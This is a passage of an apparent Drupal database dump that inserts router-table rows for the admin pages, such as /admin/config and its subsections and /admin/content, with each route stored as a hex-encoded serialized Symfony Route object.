5636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31333a227b5e2f61646d696e247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f61646d696e223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a313b733a31343a227061747465726e4f75746c696e65223b733a363a222f61646d696e223b733a383a226e756d5061727473223b693a313b7d7d, 1),
('system.admin_compact_page', '/admin/compact/{mode}', '/admin/compact', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32313a222f61646d696e2f636f6d706163742f7b6d6f64657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a35353a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a636f6d7061637450616765223b733a343a226d6f6465223b733a333a226f6666223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a343a226d6f6465223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34333a227b5e2f61646d696e2f636f6d70616374283f3a2f283f503c6d6f64653e5b5e2f5d2b2b29293f247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a343a226d6f6465223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f61646d696e2f636f6d70616374223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a343a226d6f6465223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f61646d696e2f636f6d70616374223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config', '/admin/config', '/admin/config', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31333a222f61646d696e2f636f6e666967223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31313a225f636f6e74726f6c6c6572223b733a35323a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a6f76657276696577223b733a373a226c696e6b5f6964223b733a31393a2273797374656d2e61646d696e5f636f6e666967223b733a363a225f7469746c65223b733a31333a22436f6e66696775726174696f6e223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32373a225f6163636573735f61646d696e5f6f766572766965775f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33323a226163636573735f636865636b2e61646d696e5f6f766572766965775f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32303a227b5e2f61646d696e2f636f6e666967247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31333a222f61646d696e2f636f6e666967223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31333a222f61646d696e2f636f6e666967223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('system.admin_config_content', '/admin/config/content', '/admin/config/content', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32313a222f61646d696e2f636f6e6669672f636f6e74656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a31373a22436f6e74656e7420617574686f72696e67223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32383a227b5e2f61646d696e2f636f6e6669672f636f6e74656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32313a222f61646d696e2f636f6e6669672f636f6e74656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32313a222f61646d696e2f636f6e6669672f636f6e74656e74223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config_development', '/admin/config/development', '/admin/config/development', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32353a222f61646d696e2f636f6e6669672f646576656c6f706d656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a31313a22446576656c6f706d656e74223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33323a227b5e2f61646d696e2f636f6e6669672f646576656c6f706d656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32353a222f61646d696e2f636f6e6669672f646576656c6f706d656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32353a222f61646d696e2f636f6e6669672f646576656c6f706d656e74223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config_media', '/admin/config/media', '/admin/config/media', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31393a222f61646d696e2f636f6e6669672f6d65646961223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a353a224d65646961223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32363a227b5e2f61646d696e2f636f6e6669672f6d65646961247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31393a222f61646d696e2f636f6e6669672f6d65646961223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a31393a222f61646d696e2f636f6e6669672f6d65646961223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config_regional', '/admin/config/regional', '/admin/config/regional', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f636f6e6669672f726567696f6e616c223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a31393a22526567696f6e20616e64206c616e6775616765223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f636f6e6669672f726567696f6e616c247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f636f6e6669672f726567696f6e616c223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f636f6e6669672f726567696f6e616c223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config_search', '/admin/config/search', '/admin/config/search', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f61646d696e2f636f6e6669672f736561726368223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a31393a2253656172636820616e64206d65746164617461223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32373a227b5e2f61646d696e2f636f6e6669672f736561726368247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e6669672f736561726368223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32303a222f61646d696e2f636f6e6669672f736561726368223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config_services', '/admin/config/services', '/admin/config/services', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f636f6e6669672f7365727669636573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a31323a22576562207365727669636573223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f636f6e6669672f7365727669636573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f636f6e6669672f7365727669636573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f636f6e6669672f7365727669636573223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config_system', '/admin/config/system', '/admin/config/system', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f61646d696e2f636f6e6669672f73797374656d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a363a2253797374656d223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32373a227b5e2f61646d696e2f636f6e6669672f73797374656d247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e6669672f73797374656d223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32303a222f61646d696e2f636f6e6669672f73797374656d223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config_ui', '/admin/config/user-interface', '/admin/config/user-interface', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32383a222f61646d696e2f636f6e6669672f757365722d696e74657266616365223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a31343a225573657220696e74657266616365223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33363a227b5e2f61646d696e2f636f6e6669672f757365725c2d696e74657266616365247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32383a222f61646d696e2f636f6e6669672f757365722d696e74657266616365223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32383a222f61646d696e2f636f6e6669672f757365722d696e74657266616365223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_config_workflow', '/admin/config/workflow', '/admin/config/workflow', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32323a222f61646d696e2f636f6e6669672f776f726b666c6f77223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a36383a225c44727570616c5c73797374656d5c436f6e74726f6c6c65725c53797374656d436f6e74726f6c6c65723a3a73797374656d41646d696e4d656e75426c6f636b50616765223b733a363a225f7469746c65223b733a383a22576f726b666c6f77223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32373a226163636573732061646d696e697374726174696f6e207061676573223b733a32393a225f6163636573735f61646d696e5f6d656e755f626c6f636b5f70616765223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a323a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b693a313b733a33343a226163636573735f636865636b2e61646d696e5f6d656e755f626c6f636b5f70616765223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32393a227b5e2f61646d696e2f636f6e6669672f776f726b666c6f77247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32323a222f61646d696e2f636f6e6669672f776f726b666c6f77223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32323a222f61646d696e2f636f6e6669672f776f726b666c6f77223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('system.admin_content', '/admin/content', '/admin/content', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31343a222f61646d696e2f636f6e74656e74223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a373a22636f6e74656e74223b733a31303a22646973706c61795f6964223b733a363a22706167655f31223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a303b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32333a2261636365737320636f6e74656e74206f76657276696577223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a303b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32313a227b5e2f61646d696e2f636f6e74656e74247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31343a222f61646d696e2f636f6e74656e74223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31343a222f61646d696e2f636f6e74656e74223b733a383a226e756d5061727473223b693a323b7d7d, 2),
